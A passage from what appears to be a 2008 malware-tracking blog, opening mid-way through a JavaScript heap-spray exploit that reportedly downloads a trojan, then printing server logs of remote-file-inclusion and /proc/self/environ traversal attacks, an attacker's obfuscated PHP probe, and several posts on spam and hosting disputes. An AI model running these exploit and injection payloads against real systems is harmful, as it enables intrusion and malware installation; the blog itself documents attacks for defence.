var bigblock = unescape("%u0C0C" + "%u0C0C");

var headersize = 20;

var slackspace = headersize + tcsafecode.length;

while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock["substring"](0,bigblock.length - slackspace);

while (block.length + slackspace < 0x40000) block = block + block + fillblock;



var memory = new window["Array"]();

var tcsafes = memory;

for (i = 0; i < 400; i++)

{

tcsafes[i] = block + tcsafecode

}



var buf = '';

while (buf.length < 32) buf = buf + unescape("%0C");



var m = '';



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;

</script>


Once again, this downloads rondll32.exe

http://www0.douhunqn.cn/csrss/lzx.htm
http://www0.douhunqn.cn/csrss/real10.htm
http://www0.douhunqn.cn/csrss/Bfyy.htm

All 3 of these seem to return what looks like a 404, but I can't read a bleedin word, so am not 100% sure;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/Bfyy.htm

Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 0

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:21:39:21

*****************************************************************

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML><HEAD><TITLE>ÎÞ·¨ÕÒµ½¸ÃÒ³</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">

<STYLE type="text/css">

BODY { font: 9pt/12pt ËÎÌå }

H1 { font: 12pt/15pt ËÎÌå }

H2 { font: 9pt/12pt ËÎÌå }

A:link { color: red }

A:visited { color: maroon }

</STYLE>

</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>



<h1>ÎÞ·¨ÕÒµ½¸ÃÒ³</h1>

ÄúÕýÔÚËÑË÷µÄÒ³Ãæ¿ÉÄÜÒѾ­É¾³ý¡¢¸üÃû»òÔÝʱ²»¿ÉÓá£

<hr>

<p>Çë³¢ÊÔÒÔϲÙ×÷£º</p>

<ul>

<li>È·±£ä¯ÀÀÆ÷µÄµØÖ·À¸ÖÐÏÔʾµÄÍøÕ¾µØÖ·µÄƴдºÍ¸ñʽÕýÈ·ÎÞÎó¡£</li>

<li>Èç¹ûͨ¹ýµ¥»÷Á´½Ó¶øµ½´ïÁ˸ÃÍøÒ³£¬ÇëÓëÍøÕ¾¹ÜÀíÔ±ÁªÏµ£¬Í¨ÖªËûÃǸÃÁ´½ÓµÄ¸ñʽ²»ÕýÈ·¡£

</li>

<li>µ¥»÷<a href="javascript:history.back(1)">ºóÍË</a>°´Å¥³¢ÊÔÁíÒ»¸öÁ´½Ó¡£</li>

</ul>

<h2>HTTP ´íÎó 404 - Îļþ»òĿ¼δÕÒµ½¡£<br>Internet ÐÅÏ¢·þÎñ (IIS)</h2>

<hr>

<p>¼¼ÊõÐÅÏ¢£¨Îª¼¼ÊõÖ§³ÖÈËÔ±Ìṩ£©</p>

<ul>

<li>תµ½ <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft ²úÆ·Ö§³Ö·þÎñ</a>²¢ËÑË÷°üÀ¨“HTTP”ºÍ“404”µÄ±êÌâ¡£</li>

<li>´ò¿ª“IIS °ïÖú”£¨¿ÉÔÚ IIS ¹ÜÀíÆ÷ (inetmgr) ÖзÃÎÊ£©£¬È»ºóËÑË÷±êÌâΪ“ÍøÕ¾ÉèÖÔ¡¢“³£¹æ¹ÜÀíÈÎÎñ”ºÍ“¹ØÓÚ×Ô¶¨Òå´íÎóÏûÏ¢”µÄÖ÷Ìâ¡£</li>

</ul>



</TD></TR></TABLE></BODY></HTML>
Posted by MysteryFCM at 06:49
1 comments

Saturday, 13 September 2008

WebGrid has now closed indefinitely

I'm sorry to say, after 9 years of selflessly serving the freeware community, my good friend Bob, has decided to close down WebGrid on an indefinate basis.

Part of the reason for this is due to FastHosts being a pain in the rear and deciding the site was using "too many resources" (interesting considering it worked perfectly for over 2 years without their having an issue). First they moved the site to a "probation server" and gave Bob 7 days to get it sorted out - we worked on it and tweaked it as much as we could. Second, they advised (partial quote);

The developer of the site could set it up on their own Windows PC or server, then use FileMon (a free download from Microsoft) to monitor the activity on the database.

Alternatively they could migrate the database to mySQL or MSSQL, which would almost certainly resolve the performance issue immediately.

Regards,

Russell Workman


I actually did check the site on my own machine, and a much much lower spec machine than their server, and it NEVER CAUSED A RESOURCE ISSUE!. By far the funniest however, is their mentioning migrating the database to MySQL or MSSQL. Why is this funny? MySQL is after all, a free database right? WRONG!. FastHosts actually charge £70+ PER YEAR for MySQL, and SEVERAL HUNDRED PER YEAR for MSSQL.

Finally, when we'd made the tweaks, we received a note from Chris Davis, advising us (partial quote);

We are not confident that the problem has been resolved and believe that your site would still present a threat to the performance of the shared platform were it to be moved back. We have therefore suspended all services to the website in question.

In order to regain access to the site you will need to contact us explaining the steps that you will take to address the problem. On receipt of this communication we will be able to re-enable access to the site to allow you to resolve the problem. Should you require us to remove any unacceptable data and related services in order to resolve this problem we will require your explicit authorisation to do so. Once we are confident that the problem has been resolved we will move your website back to the shared hosting environment. Any further performance issues caused by your website will result in the site being permanently suspended and so we strongly advise that, in future, you actively monitor the resources used by the domains that
you host with us.

If the problem has not been resolved within the next 7 days your site will be permanently suspended.


I am personally annoyed by FastHosts because of this issue, not just because they decided, after not being a problem for 2 YEARS, that it was automagically causing an issue, but because Bob has ran a great website for several years, at his own expense, and I doubt I am going to be alone in being sorry to see WebGrid go.
Posted by MysteryFCM at 02:47
0 comments

Friday, 12 September 2008

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang

I've been seeing this in RFI attacks lately, and even documented such on the blog;

http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html

Quite why the blog isn't displaying on IE/Avant properly escapes me, but that's another matter.

I've found this one again in todays yesterdays server logs (attacker: 195.135.183.134 - mail3.caris.de);

2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0


.. and from todays log (attacker: 83.220.144.22 - webbox442.server-home.org);


2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0


... and ....

Attacker: 193.33.20.246 (k10751109.custservers.inetgate.net)
Attacker: 85.214.58.39 (ap2000.de)


2008-09-13 00:36:34 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:34 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:35 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:36 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0

2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:49 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0


The RFI at the following has been reported to their host and owner;

http://www.jfc.info/jfcinfo/grafiken/i???

... and contains;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.jfc.info/jfcinfo/grafiken/i???
Server IP: 89.238.65.54 [ server1.jfc.info ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 13 September 2008
Time: 09:42:15:42
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


As documented previously, thanks to the help of the ISC, this exploit attempt seems to indicate that they're trying to determine which servers spit out "echo cr4nk rocks", which then indicates the server is vulnerable to attack.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-02-16
Domain Currently Expires: 2009-02-16

Current Nameservers:

dns1.public-dns.net
dns2.public-dns.net
dns3.public-dns.net


Servers IP: 67.225.157.104

OrgName: Liquid Web, Inc.
OrgID: LQWB
Address: 4210 Creyts Rd.
City: Lansing
StateProv: MI
PostalCode: 48917
Country: US

ReferralServer: rwhois://rwhois.liquidweb.com:4321/

NetRange: 67.225.128.0 - 67.225.255.255
CIDR: 67.225.128.0/17
OriginAS: AS32244
NetName: LIQUIDWEB-8
NetHandle: NET-67-225-128-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS.LIQUIDWEB.COM
NameServer: NS1.LIQUIDWEB.COM
Comment:
RegDate: 2007-11-26
Updated: 2008-01-23

OrgAbuseHandle: ABUSE551-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-800-580-4985
OrgAbuseEmail: abuse@liquidweb.com

OrgTechHandle: IPADM47-ARIN
OrgTechName: IP Administrator
OrgTechPhone: +1-800-580-4985
OrgTechEmail: ipadmin@liquidweb.com


Update: Added attacks from todays server logs
Update 2: Added formatting for code div's to stop 'em going too long
Posted by MysteryFCM at 22:47
0 comments

Dear Register.com - STOP SPAMMING ME!

Dear Register.com,
I've contacted you before, I've tried your unsubscription links, and I've even spoken to one of your employee's via your very hard to find, online chat - I've given up. You seem intent on spamming me, irrespective of my wishes.

I first contacted Register.com last year, to report a phishing scam hosted by one of their customers. Alas their response was not what I had expected as they claimed the domain was not registered (it most certainly was, and I sent them screenshots and stuff to prove it!);

Chat Session


Discussion Thread
---------------------------------------------------------------
Response (Scott K.) - 02/09/2007 09:49 PM
Dear Steven Burn,

Thank you for contacting Register.com regarding the domain name "cheko.us".

We understand that you wish to compalain about the above mention domain name.

We have checked the records for the domain name and the above mention domain name is available for registration. In that case the site which you have mentioned is not a phishing site.

If you have any further questions, please respond to this incident by replying, or using the link included at the beginning of this email. You can also contact a Web Services Consultant 24 hours a day, 7 days a week, at the numbers below.

Thank you for choosing Register.com, recognized for “An Outstanding Customer Service Experience” by J.D. Power and Associates.

Customer Support
Register.com, Inc.
Toll free within the U.S. and Canada: (877) 731-4441
Outside the U.S. and Canada: (902) 749-5918

For J.D. Power and Associates Certified Call Center Program(sm) information, visit www.jdpower.com or call 1-866-842-7548.

Chat Transcript - 02/08/2007 02:58 PM
Thank you for visiting Register.com's Live Support. How can I help you?
Steven: Are you still the registrar for cheko.us ????
Steven: If so, can you take it offline please as it is currently hosting a phishing scam for a UK bank
Steven: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Scott K.: Thank you for the domain name. Can I have a few minutes while I check the records for you?
Steven: no problem
Scott K.: Thanks.
Scott K.: The domain name cheko.us is registered with Register.com.
Scott K.: Do you wish to complaint against this site?
Steven: I know .... thats why I came to your website
Steven: absolutely
Scott K.: Okay.
Steven: the link I gave you above goes to a phishing scam hosted on this domain name
Scott K.: Okay.
Scott K.: I would have to forward this issue to our appropriate department and they will contact regarding this.
Steven: can you tell me how long that will take please?
Steven: and of course, if you can disable the domain name in the meantime?
Scott K.: The link you have provided is not working.
Scott K.: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Steven: it's working just fine here ....
Steven: I can send you a screenshot if that will help?
Scott K.: Let me check this for you again.
Steven: no problem
Scott K.: Thanks.
Scott K.: I have checked it again.
Scott K.: It shows that the URL is invalid.
Scott K.: Please check the name again.
Steven: it is definately not invalid as I have it visible in my browser as I write this .....
Steven: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Scott K.: Okay.
Scott K.: I have checked the URL twice but it is showing the same thing.
Steven: if you like, I can send you both a copy of the phishing e-mail, and a screenshot of the site ?????
Scott K.: Okay.
Scott K.: Can you send at register1@rcomtest.com?
Steven: No problem
Scott K.: Okay.
Scott K.: Is there anything else I can assist you with?
Steven: Sent both the e-mail, and a screenshot
Steven: nope, thats it thankyou
Scott K.: Okay.
Scott K.: Thank you for contacting Register.com.
Scott K.: Bye and have a nice day ahead.
Steven: No problem
Steven: and you
Scott K.: Thanks.
Scott K.: disconnected
Steven: disconnected

[---001:003239:51588---]


Ever since that chat session, they have insisted on sending me spam - not the best way to get new customers. I tried contacting ICANN about this, and was first told;

Dear Steve,

We will also contact this registrar. Please contact me again if you receive other spams from the same company.

Best regards,

Steve Gobin
Registrar Liaison Manager
ICANN Brussels Office
http://www.icann.org
http://www.internic.net


.... I then received more spam, and as he'd asked, I contacted him again, to which I received;

Dear Steven,

When I received your previous e-mail, I contacted Register.com in order to help you but, as I told you, that kind of problem does not come under ICANN's authority.

I therefore recommend you to report the problem to a law enforcement agency in the registrar's country or to spam-fighting associations such as Spamhaus (http://www.spamhaus.org).

Best regards,

Steve Gobin


Not really much help is it? Contrary to the claims of the individual I spoke to on their chat session, I am not nor ever have been, a Register.com customer, nor have I ever given them permission to spam me (evident by the fact they send the spam to register_com@ (the address I used to report the phish), and serices@ (an address I have never used (besides anything else - it's spelt incorrectly - the "v" is missing)). The indiviual I spoke to, also advised me that I would be removed from their mailing list, and someone would contact me to confirm such. Alas, nothing has been received (other than the spam), and unlike last time, I didn't receive a copy of the chat session transcript either.
Posted by MysteryFCM at 01:09
0 comments

Thursday, 11 September 2008

More vURL Online updates

I'm happy to announce, thanks to MalwareTeks and Montana Menagerie, vURL Online now has two more servers you can choose from!. Making it 2 x UK and 3 x US servers :o)

The PHP script I wrote previously, has also been updated, for those that would like to use it (and hopefully, offer a new vURL mirror ;o)). The new code is;

<?php
    $str =$_SERVER['QUERY_STRING'];
    parse_str(urldecode($str),$getVarArray);
    // URL to get
    $urlStr = $getVarArray['url'];
    $urlStr = htmlspecialchars($urlStr, ENT_QUOTES);
    // Referer URL to use
    $refStr = $getVarArray['ref'];
    $refStr = htmlspecialchars($refStr, ENT_QUOTES);
    // User agent to pass
    $uaStr = $_SERVER['HTTP_USER_AGENT'];
    
    // Get the contents
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $urlStr);
    curl_setopt($curl, CURLOPT_VERBOSE, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_REFERER, $refURL);
    curl_setopt($curl, CURLOPT_USERAGENT, $uaStr);
    $return = curl_exec($curl);
    curl_close($curl);
    print $return;
?>
Posted by MysteryFCM at 23:11
0 comments

Mininova made a woopsie - and we're paying for it!

Alas, Mininova made a woopsie with their Content Distribution System (CDS) mailing a few days ago, that resulted in their putting their members e-mail addresses in the To box, instead of the BCC box. You can guess the result.

Yeppers, since then, I've received a ton of spam from some of their members that decided to make the most of Mininova's mistake. Spam for example, from "Porno Soundtracks", who thought the spam was so ridiculous, that they decided to join in themselves!;

Oh my god ... this is getting ridiculous :) Well, seize the moment is what other do, so hereby the reason why we signed up in the first place - maybe others want to discuss their marketing efforts as well in a more constructive way?


And from UK based ibox-security.net, a company that any customer should think twice about using (they obviously couldn't give a crap aslong as they get the chance to make some cash);

Hi Guys,

I run iBox-Security a website development, hosting, SEO and IT services company in the UK. We are also in the process of building some software to run alongside the bit torrent application uTorrent which will help increase speed and keep traffic secure.

We offer great web services such as email, hosting and SEO be sure to check out site out at http://ibox-security.net and sign up to our newsletter at http://ibox-security.net/newsletter

iBox-Security | www.ibox-security.net


And what pray tell, did the Mininova staff do to warn their members about spamming? They sent the following of course;

Hi everyone,

Due to a human error, we send a minor part of our CD users an email with the addresses in the 'To' field instead of 'Bcc'. Our honest apologies for this mistake.

Having said that, the idea is not to build a community-feeling by replying to everyone. So from now on, anybody that uses "reply all" will see his CD account revoked.

Sorry for the inconvenience!

The Mininova staff


Which would be great - if it worked ....... alas it didn't, I've been receiving spam from their members since that e-mail, evidently I wasn't the only one. What did the Mininova staff do to enforce their first warning? Not much;

People,

Please stop mailing with "reply to all". Use the forum thread
mentioned below to post your experience.

Thanks for your cooperation.

The Mininova staff


Ooooh - that'll tell 'em!

Everyone makes mistakes, we all know that, but letting their members get away with spamming, because of their mistake, IS something they can and should, be held accountable for.
Posted by MysteryFCM at 22:05
0 comments

Wednesday, 10 September 2008

So THATS why the network is slow ....

... and here's me thinking something other than the current attacks and high traffic were to blame - alas nope, they aren't the only things wrong, as mentioned by the following e-mail thats just come in from my ISP;

Service: ADSL Dial
Posted: Wed, Sep 10 2008 at 14:35:48
Subject: Problems affecting Broadband connections in Northumberland

BT have told us that they have declared a state of MBORC (Matter Beyond Our Reasonable Control) in Northumberland, after a months rainfall fell in the space of a day on September 9th.

The exchanges affected are:

- Newcastle
- Benton
- Kenton
- North Shields
- Wallsend
- Prudhoe
- Gosforth
- Blythe
- Whitley Bay

BT have stated: " We have already increased the number of engineers working in the Northumberland area and provided we do not experience further severe weather, recovery to normal fault levels is expected by the start of next week. We will continually review the position with regard to assurance and our aim is to rescind this declaration of MBORC as soon as possible.

In addition to the declaration for the Northumberland area, individual instances of MBORC arising from flood damage or inability to access our network may be declared, for example where a network cabinet has been flooded."

This may mean that if you have a fault in one of these areas, that the BT response time will be slower than normal due to the increase in faults that they are experiencing.

We'll let you know once we've had any further update from BT regarding this situation.

Kind Regards,

James Bailey
Customer Support

--
This email has been sent to you because you have requested to join the PlusNet Status Mailing List. To unsubscribe from this mailing list, please visit http://usertools.plus.net
Posted by MysteryFCM at 06:29
0 comments

MediaDefender have been err what now?

Alas it seems the malvelopers want us to think the "other bad guys" are watching us. I read about these e-mails yesterday, but hadn't actually received one myself - now I feel special :o)

As mentioned previously, the e-mail reads;


Dear User!

Your recent internet activity was logged on the following sites:

*    Btjunkie <http://btjunkie.org>
*    SumoTorrent <http://sumotorrent.com/>
*    isoHunt <http://isohunt.com>
*    Btscene <http://www.btscene.com/>
*    Mininova <http://www.mininova.org>
*    Fenopy <http://fenopy.com/>
*    Monova <http://monova.org>
*    Yotoshi <http://yotoshi.com/>
*    GetInvites <http://getinvites.org/>
*    Btmon <http://www.btmon.com/>

We have attached a report about the copyrighted movies, music, softwares you downloaded or searched on these webpages. We strongly advise you to stop any future activities regarding the downloading of illegal content or you can expect prosecution by 17 U.S.C. §§ 512, 1201§1205, 1301§1332; 28 U.S.C. § 4001 laws.

Sincerely,

MediaDefender Inc.


They've also kindly included an attachment (user-B41642-activities.zip) that they claim is a report concerning copyright stuff I've downloaded or searched for on the websites they've referenced (which would be a neat trick considering I've never been on those sites).

This attachment, just like this one is detected as WORM/Agent.FT

